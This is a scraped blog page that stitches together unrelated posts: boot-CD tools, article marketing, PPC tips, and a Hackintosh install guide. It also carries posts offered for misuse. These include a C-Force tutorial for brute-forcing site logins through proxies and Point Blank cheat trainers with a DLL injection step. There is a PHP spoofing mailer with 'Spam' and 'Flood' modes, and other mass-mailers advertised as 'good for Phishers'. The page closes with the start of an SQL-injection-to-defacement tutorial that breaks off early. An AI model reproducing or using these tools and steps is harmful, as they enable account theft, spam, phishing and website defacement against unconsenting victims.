Related Posts Plugin for WordPress, Blogger...

Free Boot CD Repair Tool

Free BootCD Repair Tool. A software used to solve your problems around the world of the PC's. As delinquency overcome a virus, accidentally deleted data, hardware error (bad sectors on the disk,) System Error (missing boot loader, partition deleted and so forth.). Well, here a Free BootCD Repair Tool can take part in overcoming the disease this PC. Free BootCD is indeed free. And you can easily to use it. Here are some lists BootCD Free Repair Tool.

1. Hiren's BootCD
The first, already known to many people. Hiren's BootCD it does have many features that you can exploit to solve the problem PC. Like:

Partition Tools
  • Partition Magic Pro 8:05 Best software to partition hard drive
Backup Tools
  • ImageCenter 6.5 (Drive Image 2002) Best software to clone hard drive
Recovery Tools
  • Active Partition Recovery 3.0 To Recover a Deleted partition.
Testing Tools
  • Ontrack Data Advisor 5.0 Powerful diagnostic tool for assessing the condition of your computer
RAM (Memory) Testing Tools
  • 5:07 GoldMemory RAM Test utility
Hard Disk Tools
Hard Disk Diagnostic Utilities
  • Seagate Seatools Graphical v2.13b
  • SeaTools for Dos 1:10
  • Western Digital Data Lifeguard Tools 11.2
  • Western Digital Diagnostics (DLGDIAG) 5.04f
  • Maxtor POWERMAX 4:23
  • Amset utility 4.0 Maxtor
  • Maxtor (or any Hdd) Low Level 1.1 formatter
  • Fujitsu HDD Diagnostic Tool 7:00
  • Fujitsu IDE Low Level Format 1.0
  • Samsung HDD Utility (HUTIL) 2:10
  • Samsung Disk Diagnose (SHDIAG) 1:28
  • Samsung The Drive Diagnostic Utility (ESTOOL) 3.00g
  • IBM / Hitachi Drive Fitness Test 4:16
  • IBM / Hitachi Feature Tool 2:15
  • Gateway GwScan 5:12
  • ExcelStor's ESTest 4:50
  • MHDD 4.6
  • 1:30 WDClear
  • Toshiba Hard Disk Diagnostic 2.00b
  • HDD Regenerator 1.71 to recover a bad hard drive

And still many others. Please go to his official website directly to get the info and software. Free BootCD this one is based on DOS as the main system. The disadvantage, because this one BootCD using DOS as the primary system, then this tool can only be used to repair your PC with Windows systems only. And to note, you must have a capacity of RAM (Random Access Memory) of at least 64MB to be run well to be used as a temporary drive.
Download: HirenBootCD

2. Ultimate BootCD
The latter is indeed less popular than the 'brother' Hiren's BootCD among repairman Indonesia. But, do not regard lightly on this one. BootCD this one can also have many features that can be utilized to repair your PC. BootCD is support two operating systems namely Linux and Windows, because this tool BootCD use Linux OS as the main system. As we all know, linux OS can read the Windows OS. Deficiencies that may become obstacles for the user to use this software is a matter of interface (interface). Although the interfaces are fairly similar with Hiren's because it can not operate in multitasking.
Download: Softpedia

Judging from its name would have to guess to what exactly this one BootCD tool. BootCD course, this one devoted to Windows OS as well as Hiren's.
Download: Softpedia

4. Bart PE
Well, for the latter has a feature that is quite different because BootCD this tool can perform the process of multitasking and has an interface (interface) with the same interface on Windows (because it takes the system interface and some major systems from Windows OS to run). You can add your own tools into a system like this BartPE tool (a tool that has the interesting interface can be added to this BootCD).
Download: Softpedia

Read More 4 Comments

7 Step Article Marketing to Make Money from Internet

If you can access the Internet, can type on a computer and a brain full of ideas that can be poured, then you already have the main terms as the author of the article. But many marketing articles that circulated on the internet might make you squeeze the brain to be able to increase traffic to your website traffic. Article marketing may be equally good and equally informative. So what should you do to be competitive and still make money from internet? Listen 7 Jutsu sharpshooter article marketing as your reference!

1. Write the original article content and quality.
Search Engines like Google, Bing, Yahoo and others will not easily put your website that contains articles plagiarism. As an author of the article, you should really make sure that the article that you created is fresh and informative article. This will help your website achieve top positions on search sites.

2. Enter the article in Ezine Articles.
As a website directory submission is the most widely used by writers of articles, Ezine will provide more opportunities for readers to read your article. Backlinks and description of your official website is located at the footnotes will direct readers to the official website of your article.

3. Perform regular blog updates.
As the author of your article should not be lazy. Scheduled posting updates, your blog or website indicates that you are active and dynamic. Websites like this is the most high trafficnya in search sites.

4. Enter your article in the Article Directory.
There are many choices article directories on the internet. You can include your articles in more than 100 article directories manually and consistent. and if you feel kualahan write and distribute your articles, you can use the services of our directory submit articles.

5. Enter your marketing articles in the press release website.
As an author of the article, you would have recognized the importance of press releases. Activities and progress of your business can be promoted.

6. Build your backlinks in article marketing.
Do not forget to insert a back link on every article you write. Backlinks will be able to lead the reader who is interested in your article to the main website.

7. Comment blogs and articles with similar themes.
It seems likely small, but commenting on blogs or articles with similar themes will help to give an active impression on your website account. It is probable that the readers and writers and another article that you commented it would be interested in reading your website.

If a seventh sniper stance is adopted, article marketing you must have the strength to support the publicity of your website for an author of the article.

Read More 5 Comments

PPC Advice for Beginners

As we’ve briefly discussed before, there are many advantages of promoting your business with Pay per Click advertising; but at the same time, there are also some catches that PPC newbies should look out for.

How PPC works is that the advertisers have to setup an account with Google and/or Yahoo first. Once the accounts are ready, the advertisers then can start building up their Campaigns, AdGroups, Ads, keywords, and so on. The account managers at Google and Yahoo then will look after the accounts and make sure everything works (no violations of guidelines, ads are showing up, etc).

At this point, a lot of advertisers will assume that everything is done, and they can just sit at home waiting to count their cash. Well, that maybe the case in fairytale wonderlands, but definitely not in the world we live in. The reality is, a lot of times the teams at Google and Yahoo get so overwhelmed by their work and they lost tracks of what have been done and what hasn’t, resulting in a lot of updates being not approved (because no one had reviewed them).

This is more of a problem with Google than with Yahoo. With Yahoo’s system, if the newly submitted updates are still under review, you can see their status being �oeeditorial pending”. If it’s been ten days since you first submitted your update and the status is still �oeeditorial pending”, you know someone has forgotten to do their job. Just send an email to your account manager at Yahoo and state what the problem is and the problem should be sorted out in a day or two.

Google is somewhat different. Once you’ve submitted an update to Google, you will immediately see its status being �oeactive”, same as all the existing ads, keywords, ad groups you have. So if after ten days and you are still getting no impressions from the new update, and you intuitively check to see if the update is actually running, and when all you can see is it being �oeactive”, you will just think �oeOh, I guess no one has searched for it yet”, when in fact, Google’s just forgot to review them.

So monitor your accounts frequently, and the moment you sense something’s weird, fire an email to your account manager. Don’t be shy to send multiple emails in a day if that’s what it takes to get things fixed.

Summary : As we’ve briefly discussed before, there are many advantages of promoting your business with Pay per Click advertising; but at the same time, there are also some catches that PPC newbies should look out for.


Read More 1 Comment

There are five simple steps to make more traffic on your website.

There are five simple steps to make more traffic on your website.
  1. Make website SEO based and try to get high rank.
  2. Purchase Advertisement package from big companies like yahoo, adwords.
  3. Post your articles to directories about your new website and business etc.
  4. Post Advertisement on different free advertisement websites.
  5. Use traffic exchange program (exchange links with those website who have similar contents and information from your website)

Read More 0 Comment

How to Hack Passwords With C-Force Tutorial + Pics

First what i want to say is, that my english is not the best but i hope you can understand what i want to say!

This is how we get free passes for sites. C-Force only works on sites that are called Pop-Up sites.
Example, when you click on Members Sign In, and then the USERNAME/PASSWORD box pops-up, yeah its a pop up site.

Note: C-Force will not crack ocr forms (= form sites with a code vertification in a box)

So what do we need?

a) A copy of C-Force which you can download here:

b) A big, good proxylist with anon proxies which you please check in
with Charon

c) wordlist

Step 1: Start C-Force and open the tab “Settings”:
- Check this: “Skip proxy anonymity test” (we are checking our proxies with Charon)
- Never check this: “Use proxy for analyses” (it wouldn´t analyze the site correct)
- NEVER check this: “Bruteforce without proxies” (or you have good chances to go to jail)

Step 2: Open the tab “Pro” – Main Url, Analyse, Bruteforce

- Main Url: Get the members url by clicking on the members access section
For example: http://
Place this url into the Main url field


after clicking on

- Analyse: it looks like that


After that click on

- Bruteforce: After pressing “Bruteforce” you will be directed automaticly in the “Auto” menu


Step 3: Load Proxylist and Wordlist

Proxylist: Click the “Load” tab beside “Proxy-List:” and find saved Proxylist on your PC C-Force will let you know that your Proxies are loaded.

Wordlist: Click the “Load” tab beside “Combo-List:” and find saved Wordlist on your PC C-Force will let you know that your Wordlist is loaded.


After clicking on “START” will follow

Step 4: Hits, Check your hits in the right way


- Correct: Go to the login page and enter the username/password manually
- Wrong: Never click the link which is shown in the lower strip, for example:


You can use this option only for Pop-up login sites but NOT for form sites!

Finally the Result —> the door is open…pleace come in and enjoy sweet Member

Read More 4 Comments

Point Blank Cheat On the cheat ninja saga 12302010 and 12302010

1. Cheat Point Blank (PB) SNUTZ REVOLUTION December 30, 2010

F1 = Wallshot ON
F2 = Wallshot OFF

INSERT = Minimize ON (auto minimize)
DELETE = Minimize Off

F10 = Viper / Hide Helm
F11 = DFox / Leopard Helmet
F12 = Reset Char

Numpad 1 = Berets SG
Numpad 2 = Beret Sniper
Numpad 3 = Beret Assault
Numpad 4 = Berets SMG
Numpad 5 = Berets Pistol
Numpad 6 = Beret Item

HOME = Hack Title
END = Hack Rank / Points / Cash
F6 = BugTrap System (Special for CHATTY Find Offset)
F7 = Quick Exit Game
F9 = Spion Mode

How to Use Robot Char:
Choose Barrett - START-F10/F11 Pls loading - Finished Loading F12

Wallshot and Minimize handling system for non-exit cockroaches OFF

Credit by me: indrascott
Special Thanks to:
* AnasTM
* Rifqi36
CHEAT 30, 31, 122010, cheat pb, cheat point blank terbaru wallshot, cheat wallshot, cheat pb 31 desember 2010,
2. Cheat Point Blank (PB) Pasimbung v1.4 Nano December 30, 2010

Product Name: Nano version Pasimbung v1.4
Released: 30-12-2010
Creator: hrd
Greetz to:
[*] dono
[*] Drache
[*] John_Smith

Archive Type: ZIP
Included files: pasimbung.exe (exe: ASPacked, etc.: PESpinned)
: Readme.txt
Requirements: Flash player, the need to display the injector interface
Target Game: PointBlank
Anti-Cheat: AhnLab HackShield
Type: Trainer

[*] Map Hack, Luxville to CrackDown [F5 ON / OFF]
[*] Map Hack, Downtown to CrackDown [F6 ON / OFF]

Additional note: please copy and paste, but keep the credits!

How to use:
- Join room BM (luxvile / dt)
- Press the hotkey (F5/F6 [ON]) before the start
- Press the hotkey (F5/F6 [OFF]) on the loading screen

Do not forget Credit By hrd

3. Cheat Point Blank (PB) MICRO_INJECTOR December 30, 2010

Cheat / Trainer EffectL
[*] Minimize Pada Wikipedia: F5
[*] Minimize Off: F6
[*] Wallshot On: F9
[*] Wallshot Off: F10
[*] Spion On: F11
[*] TitleHack: F12

[*] Shotgun Baret: [Numpad-1]
[*] Sniper Baret: [Numpad-2]
[*] Assault Baret: [Numpad-3]
[*] Mitraliur Gun Baret: [Numpad-4]
[*] Pistol Baret: [Numpad-5]
[*] Baret GM: [Numpad-6]

download , extract and hold on to the Windows \ system32

continue to RUN

regsvr32 C:\WINDOWS\system32\GIFviewer.ocx

Creator: No Name
Special Thanks TO: Ba1mA2

4. Cheat PB 30 Desember 2010 30122010 5nutzeR A.1.0

PB Cheat December 30, 2010 30,122,010 5nutzeR A.1.0

F1 => WallShoT (On.)
F2 => WallshoT (Off)
F5 => Supreme Buster (Gun Shoot)
F6 => Still Assassin (Sniper)
F7 => Rowdy Beast (Assault)
F8 => Nimble Sneaker (Sub Machine Gun)
F9 => Shooting Star (Pistol)

Tutorials Usage:

- Press the Hotkey Beret What You Want Kan (example: F7 => Rowdy Beast [Assault])
- Press F1 => WallShot (On.)
- Start (Play)
- And So Loading Map, Press F2 .....

Credit By: Andiliu (5nutzer)

Download Cheat Point Blank December 30, 2010 30,122,010 5nutzeR A.1.0

PB Cheat December 30, 2010 5nutzeR A.1.0
Cheat Point Blank December 30, 2010 5nutzeR A.1.0
PB Cheat December 30, 2010 Point Blank 30,122,010 5nutzeR A.1.0
PB Cheat December 30, 2010 5nutzeR A.1.0 A.1.0 Point Blank 5nutzeR 30,122,010
Cheat Point Blank bp bp December 30 December 30 December 30 December 30, 2010 5nutzeR A.1.0

5. Cheat PB 30122010 30 Desember 2010 [P-M]Pamore

Cheat PB 30122010 December 30, 2010 [P-M] Pamore
- Dedication of the [P-M] Pamore
-No Junk
-No Flames
-No Belaguers
-Especially in this Thread ..

Released: 29/12/2010
Creator: penkUSN
Greetz to: US-Net Family
Anan bang
om bald
om benZ666
mbah eMonKie
om kewel
Special greetz to: OM maStaH Hero ™

Archive Type: RAR
Included files: => [P-M] paramore.exe
Target Game: PointBlank
Anti-Cheat: AhnLab HackShield Pro
Type: Trainer / Cheat
Cheat / Trainer Effect:

[™] Minimize On: F1
[™] Minimize Off: F2
[™] Hack Grade + title = F12

How to use:
[-] For when starting WAS Play On and Off at Loading screen Play

6. Cheat PB 30 Desember 2010 Point Blank 30122010 SM Sharemind V.3.5

PB Cheat December 30, 2010 - Update December 30, 2010 PB Cheat, Cheat Cheat or PB 30,122,010 30,122,010 Point Blank the which will from this time discuss about PB Cheat December 30, 2010 Point Blank 30,122,010 BC Sharemind V.3.5.

Cheat hotkey feature PB 31122010 [S] [M] V.3.5 ShareMind Injection
[*] Insert = WallShootON
[*] Delete = WallShoot OFF
[*] F9 = Spion
[*] F10 = TitleHack
[*] F11 = UnName <>>> Play
>>> loading the room tap Delete

How to Wear Berets
Click on the desired Hotkey beret right>>> Play
How to use Char Hack
Start>>> loading room click Numpad +>>> have any posts pas
"While Preparing Game" Direct click Numpad -

Read the Rules of Use - Use System ON OFF - DC / BT
Depending Use
On some antivirus will cause fals alarm, because the file
has been packing ....

Created By ninaShareMind
cheat pb 31 desember, cheat wallshot, auto exp point blank 30122010, wallshot, cheat pb wallshot, cheat 31122010,
Special Thank 's to: HRD - RCD - All

Download All Here

cheat pb 31 desember 2010, cheat pb 30 desember 2010, cheat pb 31 desember 2010, cheat point blank, cheat 30122010, cit pb 30122010, cheat pb, cheat pb, CHEAT POINT BLANK 31 DESEMBER 2010, cheat pb 31122010, cheat pb, cheat point blank 31122010, cheat pb 31 desember 2010, cheat pb 01 January, cheat pb 01 January, cheat pointblank 01012011, cheat pointblank 01 January 2011, cheat 01012011, cheat pb, cheat pb terbaru, cit pb 01012011, cheat pb 1 hit update 01 January, cheat pointblank 31 desember 2010, cheat point blank snutz tanggal 31 desember 2010, cheat pb 1 hit update 31 desember 2010, cheat Map Hack 30122010, cheat point blank 30 desember blogspot, cheat point blank 01 january blogspot,

Read More 1 Comment

Make a Different Facebook Profile - Tutorial

I don't know exactly where to post this , so i post it here..
Im sorry if this is wrong section.

I didn't write this Tutorial , i just found it and sharing it here.
But i've checked it and its working Oui

Here is what you'll get .

and Follow These Instructions :

Step 1: Upload your desired picture and let it to generate the correct images.

Step 2: Download the generated ZIP file of your images, or manually save them.

Step 3: First, set the image named "profile-pic.jpg" as your Facebook profile picture.

Step 4: Create a new photo album, then upload the other images in the order of their filenames.

Step 5: Tag yourself in all 5 photos, starting with "image5.jpg" and ending with "image1.jpg."

Step 6: Hide any tagged photos you do not wish to display on your profile. That's it!

Reply comment if you like this post ....

Read More 1 Comment

How to Install Mac OS X on a PC (Without Using a Mac)

There are many great tutorials on the web for using a Mac to install Mac OS X Snow Leopard on a PC. Unfortunately, you may be unable to follow such tutorials if you do not readily have access to a Mac to perform the preparation necessary for the installation.
Great progress has been made in hacking PCs to run OS X, and it is now possible to install Mac OS X without a Mac. Thanks to some great tools put together by some brilliant hackers, it is also much easier and does not involve nearly as much time and effort as was once required.

Step 1: Getting The Hardware Ready

I recently purchased the following set of hardware for the purposes of building a Hackintosh (often PCs running Mac OS X are referred to as such):
The motherboard has an 8-pin power connector on it, and although it is possible to connect a single 4-pin connector to it, you may encounter odd issues running with just a single 4-pin connector. To ensure that you provide sufficient power to the board, you should purchase the 4-pin to 8-pin power adapter. Alternatively, you could purchase a power supply with 3x 4-pin connectors (1 for the 20+4-pin main connector, and 2 for the 8-pin connection) or an 8-pin connector.
I did not purchase a hard drive or video card, as I used some I already had from another PC, but you will need those items as well. As of the time this article was written, you can get a 1TB drive shipped for $75 and an NVIDIA GeForce 9500 GT video card for $65.
I also purchased v10.6.3 of OS X Snow Leopard retail DVD for a mere $29 (was about $35 with shipping & handling).
All-in-all, the full system (without monitor) will run you around $600 (you could also add a 22″ monitor for $170). You could certainly try doing it even cheaper with different hardware, but you’ll need to figure out the appropriate changes to make in the BIOS and boot loader installation.
I did my best to put together a fairly modern system for a very reasonable price. Having used this set of hardware, I can affirm that it runs OS X Snow Leopard very well. Without a doubt, $600 – $800 is a far cry from what you would spend on an equivalent Mac from Apple. Granted it won’t be as compact or pretty as an iMac, but it will be just as functional.

Step 2: Putting The Hardware Together

If you purchase the hardware I used, along with a hard drive and NVIDIA GeForce video card, you should be able to follow the instructions exactly as I’ve laid them out. If you’ve never built a PC before but are willing to give it a try, you’ll definitely want to check out The Idiot’s Ultimate Guide to Build Your Own PC. It is a step-by-step guide to building your own PC, with plenty of photos to help you out.
You can try following this tutorial with existing hardware you have as well, although you may need to make adjustments when configuring the BIOS and installing the boot loader. The more modern your hardware is, the better the chances are it will work for you. It would be best if you have a 64-bit Intel dual-core (or quad-core) processor, although an older CPU might still work as well. I would recommend NVIDIA GeForce video card, but ATI cards should work too.

Step 3: Prepare The Boot Disk

In addition to the hardware and a retail copy of Mac OS X Snow Leopard, you’ll also need a blank CD. You may want to use a rewritable CD if you’re using a different hardware configuration, just in case the first one I recommend doesn’t work for you. There are two boot disk images that will allow you to install OS X directly from the installation DVD:
I successfully used both of them with my hardware setup. However I recommend you try iBoot first, as it is a bit leaner and doesn’t take as long to boot. If you’re using my hardware configuration, be sure to download the iBoot Supported disk image. If you use Empire EFI, download the Empire EFI v1.085 R2 image.
You can use one of many free programs to burn CDs if you don’t have one. Be sure to use the disk image burning mode in your CD burning software. Do not just simply copy the disk image file to a blank CD. I like InfraRecorder, because it makes this very easy. All you have to do is click the Write Image button, select the image, and burn it. Once again, you may wish to use rewritable media if you’re using a different hardware configuration than mine.

Step 4: Bios Configuration

Fortunately, the Gigabyte GA-H55M-USB3 does not require a lot of configuration to run Mac OS X. When you first turn on or reboot the machine, press the delete key to enter the BIOS setup. You can just load the Optimized Defaults, and just make a few changes within three sections of the bios: Advanced BIOS Features, Integrated Peripherals, and Power Management Setup.
4.1 – First, go to Advanced BIOS Features and set the First Boot Device to CDROM. I have my USB drive as the second drive and then Hard Disk as third – you can configure yours the same way if you wish to ever boot from a USB drive. Just be sure that Hard Disk is the Second Boot Device or Third Boot Device.
4.2 – Next, configure SATA to run in AHCI mode in the Integrated Peripherals menu. You’ll need to set both PCH SATA Control Mode and Onboard SATA/IDE Ctrl Mode to AHCI.
4.3 – Finally, go to Power Management Setup and set the HPET Mode to 64-bit mode.

Step 5: Installing Mac OS X

5.1 – Insert the iBoot (or Empire EFI) boot disk.
5.2 – When you see screen below, eject the disk.
5.3 – Insert the Retail Mac OS X Snow Leopard DVD, wait a few seconds, and press F5.
5.4 – When you see the screen below, select Mac OS X Install DVD (it should already be selected) and press Enter.
5.5 – If all goes well, you should eventually see the language selection screen for the installer. If all did not go well and you do not make it to the language selection screen, try downloading a different version of iBoot or Empire EFI.
5.6 – Select your language and click the arrow to proceed.
5.7 – Next, you need to partition your drive. Click on Utilities > Disk Utility.
5.8 – Select your disk drive.
5.9 – Click Partition.
5.10 – Select 1 Partition for the partition scheme. Note: If you have a drive that is larger than 2 TB, do not create partitions larger than 1 TB. Split the drive into multiple partitions, and be sure the main installation partition is 1 TB or smaller.
5.11 – Enter a name for the partition (I used Hackintosh).
5.12Select Mac OS Extended (Journaled) as the Format.
5.13 – Click Options…, select GUID Partition Table, and then click OK.
5.14 – Click Apply.
5.15 – Quit Disk Utility and proceed with the installation. Install on the Hackintosh partition.

Step 6: Installing the Boot Loader

Do not fret when you reboot after the installation and get a boot error, as you will need to first boot the machine with iBoot (or Empire EFI). Eject the Mac OS X Snow Leopard install DVD, put your boot CD back into the drive, and reboot the machine. Now when you boot up, you should see a second choice for your installation partition (Hackintosh if you named it that way). Select the Hackintosh partition and press Enter to boot into OS X.
Once you’ve completed the first-run setup, open up Safari and download Multibeast. Multibeast is another superb tool by tonymacx86 and MacMan that makes it stupid easy to install the boot loader, along with all the drivers necessary for your Hackintosh to function properly.
In addition to downloading Multibeast, you will need to download the DSDT for the Gigabyte GA-H55M-USB3 and copy it to the desktop. Be sure to save it as DSDT.aml. Launch Multibeast and make the following selections (your choices will differ if you have a different motherboard/hardware configuration):
  • UserDSDT
  • System Utilities
  • Advanced Options > Kexts > Audio > LegacyHDA > ALC889
  • Advanced Options > Kexts > Graphics > NVEnabler
  • Advanced Options > Kexts > Network > RealtekR1000SL
  • Advanced Options > Patched Kernels > 10.3.1 Supported Kernel

After MultiBeast finishes installing, eject the iBoot CD and reboot the system. You should be able to boot right up from the hard drive, and all your devices should work just fine.

Step 7: Getting Started with Your New Mac

So what now? Most certainly you’ll want to check out 5 apps to get more out of your new Mac as well as 15 must-have apps for your Mac. In fact, you should probably just go ahead and browse the entire Mac section on MakeUseOf, as you’ll find a wealth of great free stuff for your new Mac in there. And most importantly make sure to download MakeUseOf’s getting started manual for Mac. Highly recommended for switchers.
If ever you encounter into problems with your new Mac, you can always seek help from MakeUseOf Answers.
If you have any problems installing Mac OS X on your PC, just post a comment right here and we’ll do what we can to help. Just be sure to provide as much information about the hardware you’re using:
  • Motherboard make and model (i.e. Gigabyte GA-H55M-USB3)
  • CPU model (i.e. Intel Core i3-530 )
  • GPU model (i.e. NVIDIA GeForce 9900 GT)
I never managed to get sleep to work. When I try to put the computer to sleep, it sort of goes into a coma. The fans never shut down and the machine doesn’t wake up when you press the power button. If you manage to get sleep to work with my hardware configuration, please do feel free to share your solution in the comments on this article.
There are also many great forums and sites out there that provide a lot of information and assistance with running Mac OS X on PC. Here are just a few you may want to check out:
If you do seek assistance from any of these or similar resources, be sure to search for your problem before posting it. You will be flamed to no end if you ask a question that has already been answered. Another tip for posting in these forums: never call it a MAC (in all caps) instead of a Mac, or you will solicit many abusive responses. Mac is an abbreviation not an acronym.
Here are a few more links that provide tools and files to help you set up a Hackintosh on hardware other than what I’ve mentioned here:
  • myHack – Another bootloader/kext installer, similar to Multibeast
  • – A good resource for downloading Kexts (device drivers)
  • Kext Helper – A tool that makes it easy to install new Kexts
  • Kext Utility – A tool to ensure proper kext installation
  • Chamelon Boot Loader – The boot loader that pretty much all the boot disks out there use (including iBoot and Empire EFI).
  • netkas PC EFI – Used in combination with Chameleon to provide maximum compatibility for booting OS X. Most boot disks use this as well.
  • BootCDMaker (French) – Utility (for Mac) to create your own custom boot disks
A million thanks to tonymacx86 and MacMan for developing iBoot and Multibeast to make installing Mac OS X Snow Leopard on PC a piece of cake. Enjoy your new Hackintosh and let us know what you think of it!
Disclosure Statement: Please note that the links to the hardware in this article are affiliate links. MakeUseOf will earn a small commission on any purchases you make. Commissions earned will support the staff of MakeUseOf and allow us to continue to bringing you more great articles.
Disclaimer: Please note that running Mac OS X Snow Leopard on hardware other than a Macintosh is against the Mac OS X End User License Agreement (EULA). If you have concerns about this, you may wish to read Is Making Your Own Hackintosh Legal? By installing Mac OS X you are in breach of a contract (breaking a contract is not the same as breaking the law). As long as you own a legal copy of the software, you are not in violation of copyright law.

Spoiler For Source :

Read More 1 Comment

How to Easy Setup your own Anonymous Email (or Fake Email) Service !

What is anonymous email (or fake email)

Anonymous email, often referred to as prank email (or fake email), allows the user to send an email without disclosing their identity. The system uses a simple input form on a web page. Information is entered filling out the elements of a real email. Sender's and recipient's email addresses, subject and message body are usually the minimum required fields. Clicking on the send or submit button activates a script formats the information and then sends out the bogus text with the system mail utility. The recipient opens a real looking email from the fake address and reads the prank content. Prank email's primary purpose involves playing practical jokes on acquaintances. Some services offer canned pranks like a payment notification from an online adult "novelty" store with an itemized order confirmation. Most pranksters like to write their own situation specific pranks. The service can also be used to anonymously pass information. Beware, Internet forensics mean that only casual end users will be fooled. This is not the method of choice for agents of international intrigue, smugglers, or mercenaries. Savvy users who check their mail headers won't be fooled by prank email. Those using prank email for illegal purposes will discover that the anonymous service will turn over their router and server logs rather than be liable. In other words, recreational use only.

Method #1

What you will need

1) Host with PHP and Sendmail support
(for example FREE hosting was tested and works nice without ads, works fine but adds to messages annoying ads).
...or find another

2) PHP script by NOmeR1 "Sender Anonym Email :: FLoodeR :: SpameR"

<? /*
(C) NOmeR1
<title>Sender Anonym Email :: FLoodeR :: SpameR</title>
<? // error_reporting (0);
set_time_limit(0)) { $limit false;
} else { 
set_time_limit(0); ignore_user_abort(1); $limit true;
$log 'log.txt'// Log file
set_time_limit(0) = <?if($limit)echo('<font color=Green>On</font>');else
'<font color=Red>Off</font> (Working time is limited with the current settings of the server)');?><br>

$_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3')
$_POST['to'] = stripslashes($_POST['to']); $_POST['msg'] = stripslashes($_POST['msg']); $_POST['from'] = stripslashes($_POST['from']); $_POST['subject'] = stripslashes($_POST['subject']);

$_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe'])
$headers "MIME-Version: 1.0\r\n"$headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251\r\n"$headers .= "From: ".$_POST['from']."\n";
$_GET['mail'] == '1')
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');
$_GET['mail'] == '2')
$_POST['to'] = explode("\n",$_POST['to']);
$_POST['to'] as $poluchatels)
mail($poluchatels$_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message');
$_GET['mail'] == '3')
mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message'); sleep(1);
'Incorrect (or not entered) number of messages');
$f fopen($log,'a'); fwrite($f,'Message sent &'.$_POST['msg'].'& with subject "'.$_POST['subject'].'" for "'.$_POST['to'].'" from IP - "'.$ip."\"\r\n"); fclose($f);
'<center><b><font color="green">Message succesfully sent</font></b></center>');
<form style="width:350px" method='post'>
<? if($_GET['mail'] == '1' || $_GET['mail'] == '3')
"Receiver &nbsp;<input type='text'name='to'><br>");
Sender <input type='text' name='from'><br>
Subject &nbsp;<input type='text' name='subject'><br>
<? if($_GET['mail'] == '3')
"Amount of messages <input type='text' name='kol'><br>");
htm -> <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'> :: <input type='radio' name='tipe' value='plain'><- text<br>
<? if($_GET['mail'] == '2')
"Receivers<br><textarea name='to' rows='10' cols='30'></textarea>"
<textarea name='msg' rows='10' cols='30'></textarea><br><br><input type='submit'>
<? }
} else { 
<a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Send simple message</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Spam</a><br>
<a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Flood</a><br>
<? ?>

It's very easy. Just save the script above as mail.php and copy it to the server (via FTP or cPanel's File Manager) into your public_html dir and begin to send mails. Type in your browser for example <your_subdomain_name><yourfile.php>

Method #2

What you will need

1) Host with PHP and Sendmail support (for example
2) AJAX project (Anonymous Mail).
(Source code was taken from, Author of project: with support LiveDev Group, GPL license)

Features of the project

- Using UTF8 (you can use any characters in your messages)
- Using HTML и TXT/plain formats
- You can send letters with any return address
- Supports attachments
- Using AJAX without page reloading

It's very easy. Just decompress and copy files to the server (via FTP or cPanel's File Manager) and begin to send messages.
1. File --> multiupload
2. Pasword--> HFthebest

Method #3

What you will need

1) Host with PHP and Sendmail support
2) Dark-Mailer V.2.2 © by p0LYM0rPH2012 and ZyphoMud DarkenedCore Admin Team

Features of the project

- Anonymous mailing
- Spam massmailing
- Mail grabber alpha-version
- Using HTML и TXT/plain formats
- Supports attachments

Copy file Dark-Mailer V.2.2.htm (better rename it) to the server (via FTP or cPanel's File Manager) and begin to send messages.

How to use:

Simply fill out the form and press the "Send"-Button. You can attach a file, which will be uploaded to the server, encoded for the Email and then be deleted from the server(If PHP Safe-Mode is not active). If you wish, you can spam around by inserting a lot of Email-Adresses and let the script pass through this list about 1000 times ;). The PHP execution time depends if Safe-Mode's on! If you type "{email}" in the "Subject" or "Message" field the script will exchange it with the Email-Adresse you typed in the "Your Email" field. You can set the Email to a plain text Email or a HTML-Email (with or without parsing BBCodes)...good for Phishers ;)
Supported BBCode Tags:
Now you can try out the new E-Mail Grabber. Type an URL and the Grabber will search for E-Mails on the site. The Grabber is Alpha.

1. File: multiupload
2. Pasword: HFthebest

Method #4

What you will need

1) The script requires host with PHP 5 support - because of the function call htmlspecialchars_decode, you need to turn "back to HTML" received from TinyMCE data. Of course, writing your analogue of this function, can use the script and the previous versions of PHP. The file "time" should be writable.
2) PHPMailer script.
Source code was taken from and translated from Russian to English

Features of the project

Presented script, in fact, is simply "cheat" over a similar function call mail. To write and edit messages in HTML format, it uses the excellent (about 1.5 Mb in the decompressed state) library TinyMCE, plus contains several additional features for validating input data, set limits on the time between retry, etc. This script allows you to create the message body in a WYSIWYG-editor, like an ordinary Microsoft Word, and send the letter as plain text (the switch to the right of the button "Reset"). Time to re-send, as well as restrictions on the maximum message size and the maximum length of words are set in config.php. After sending letters to the script leaves a letter in the form and allows you, after you specify the number of seconds, send again. I think it is easy to add to post.php a few lines of code to send out a letter on the list of addresses stored in a text file. This version of the script does not requires MySQL. Attaching a file to a letter in this version of the script is not available, but you can embed links to external resources, including graphics. If you want full support for attachments - add to library TinyMCE modules MCFileManager and MCImageManager, configure them and place on the host. The official website of these modules are invited to buy, but if a little try, you can find anyway.

It's very easy. Just decompress and copy files to the server (via FTP or cPanel's File Manager) and begin to send messages. To send message you must enter correct digital number.
1. File: multiupload
2. Pasword: HFthebest

And I Finish, Goodluck

Read More 7 Comments

SQL INJECTION (From start to Defacement)



I i took some parts of the sql injecting from I wrote the defacing part. I'm posting this here coz this tut explains everything step by step. but most of the sql tuts ends when we find the password hash. So newbees dnt know wat to do after that. In this tut i'm gonna explain how to deface a website from scratch hope you fill find this usefull....
i'm not a good hacker but i want to share my knowledge with every one.. so if there are any mistakes pls forgive me....
If you find this tut usefull please post a comment.... Black Hat


First we must find our target website to do that you can use this "dorks".
I'll give some dorks here copy anyone of it and paste it in google and search.


you can find lots of dorks here..(use them without the " " marks)

1). Check for vulnerability

Let's say that we have some site like this

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection :)

2). Find the number of columns

